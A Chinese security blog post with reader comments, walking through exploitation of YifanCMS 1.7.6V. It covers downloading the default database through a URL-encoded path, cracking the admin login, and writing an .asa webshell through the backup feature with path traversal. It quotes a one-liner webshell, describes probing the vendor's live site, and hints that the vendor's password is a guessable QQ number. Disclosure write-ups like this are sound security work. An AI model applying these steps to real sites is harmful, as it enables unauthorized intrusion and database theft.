渗透测试实战案例:艺帆CMS漏洞分析和官网测试

2013-12-09 409027人围观 ,发现 30 个不明物体 WEB安全

首先,这个艺帆cms的官网、论坛、演示站,从老版本我就测试和提交给官方了

可惜石沉大海 希望能够重视啊~

1. 环境

本地虚拟机搭建IIS+YF_CMS1.7.6V最新版

官方网站seo.i5808.com 

资源标题:艺帆企业CMS1.7.6V 

演示网站:http://seo.i5808.com 

官方论坛:http://www.i5808.com 

关键词:艺帆企业CMS1.7.6V,YifanFCMS,免费cms,企业CMS 

类型:asp/access

功能:单页设置 单页分类设置 新闻 产品 下载 在线招聘 在线留言 会员系统 在线下单 幻灯管理 友情链接管理 数据库备份 

艺帆企业CMS1.7.6V蜕变上线_全新后台界面!全新通用模板

集成1.7版本中的全部优势项目,

1.7.6版本以其它版本的区别:更加简约方便的后台管理设计,因为很多用户反应,取消了艺帆以往版本中一直有的异步加载功能。

更新:对整体数据结构和读取方式进行了优化,界面全新设计,取消之前版本中使用率偏少的JS脚本,加快运行,新增了插件拓展功能(更多艺帆企业CMS插件陆续上线中),;  

特色功能:简约代码,让你的网站轻快流畅。全站DIV+CSS 自动伪静态.html结尾 关键词自动匹配设置 全面针对搜索引擎优化。图片批量上传,省去一张张上传的烦恼;

模板库:精准行业定位,发现品牌设计的价值。每一个企业网站模板都属于自己的一个调性,亦或是可以说是一个卖点(产品诉求),一种情感的表达。我们一直在设计中融入这样的氛围,带入浏览者的感觉;   

安全:道高一尺,强力保护您的爱站,不定时收集反馈BUG和漏洞,不定时的更新安全防护。让您的爱站每天接受体检,享受免费医疗的福利。(真的吗? 原来提交咋不理我呢~)  

其他说明:首页幻灯才用JS而非Flash ,搜索引擎蜘蛛更能识别并爬到相关链接,没有缩略图的新闻会自动显示暂无图片,所有链接图片均有alt注释和title标注 全站完整无错,如无法架设可以去论坛看下教程 

后台地址:i5808  账号:i5808 密码:123456

2. 目的

 测试新版YF(艺帆)_CMS1.7.6V

3. 流程

 访问看下首页,新版本布局改动挺大的~

 艺帆首页

直接访问下后台吧~

 艺帆后台

恩。挺漂亮的,好吧,看看怎么获取账号密码吧~

注入看来是不行的,新版对sql注入好像修正了不少~

我们直接看默认数据的路径和默认名吧~

OneFCMS_Data/OneFCMS$%#$#Data$%#2012#$11$$#7.mdb

直接测试官网下

返回

 默认数据返回

好吧,看来有井号不行,直接改下编码

 编码修改a

恩,然后访问:

OneFCMS_Data/%4F%6E%65%46%43%4D%53%24%25%23%24%23%44%61%74%61%24%25%23%32%30%31%32%23%24%31%31%24%24%23%37%2E%6D%64%62

丢给迅雷

 迅雷测试链接

好了 直接就下载了~~不做防下载处理,直接文件名加井号,这个太不负责任了撒~打开数据库看下管理员账号密码:

 打开数据库看下管理员账号密码

很好,解密后我们登陆后台~

 艺帆后台登陆

后台风格做的不错哈~

然后我们果断找到数据库备份的地方

 数据库备份

看看能不能直接备份成asp

 无法备份成A'S'P

看来是不行的,但是这种过滤往往是黑名单,不允许asp,意味着aspx也不行,好在我们有asa和cer可以用,来试试看~

 备份数据库

这里我加了两个../意思是往上级目录跳两级,顺便测试父路径封锁了没,如果备份好的路径不能执行脚本的话,我们就可以用这个漏洞吧马写到别的目录里面去,顺便测一下吧~

 备份数据库

恩,asa成功写入,父路径看来也跳成功了~

声明下,我这里是在文章编辑里上传了一个一句话木马的图片,把图片直接备份成asa的马,当然大家可以随意找地方写一个数据库一句话木马:┼攠數畣整爠煥敵瑳∨≡┩愾,然后备份整个数据库成.asa的马。都可以~

好的,访问下木马试试,刚才我吧路径等于是跳到根目录了~

 跳转到根目录

恩成功的显示了图片的内容,木马的内容应该执行了,接着菜刀连接吧~

OK,菜刀连接正常。

接着我们看看为什么新版本的注入漏洞都没了。

 详细文件列表

这里后台有一个很灵活的防注入插件啊,封几个语句的话,注入估计就有难度了。

好吧,接着我们测测官网有木有这个数据库漏洞~

 测试官网数据库漏洞

毫无疑问,我是掉进坑里的,~这个数据库可下载的漏洞提交给官方好几次了,不重视啊~好心当驴肝肺了,算了,就不搞他了截图走人。

对了,更坑爹的是,官网的密码是他们的客服QQ号,搞社工的 应该是秒进后台吧?

4. 总结

1.数据库默认路径默认数据库名未做放下载措施
2.数据库备份漏洞
未过滤asa,cer等等可执行脚本后缀名
未禁用父路径写文件
3.官网弱口令,直接就用QQ号当后台密码

*本文作者:p0tt1,转载请注明来自 FreeBuf.COM

这些评论亮了

  • h3len 回复
    为啥FB要河蟹我的大名? 我是嗨len!我是轮哥!
    )27( 亮了
  • 骸綸 回复
    我刚取的中文名字,反正高考不考英语了。
    )14( 亮了
发表评论

已有 30 条评论

取消
Loading...
css.php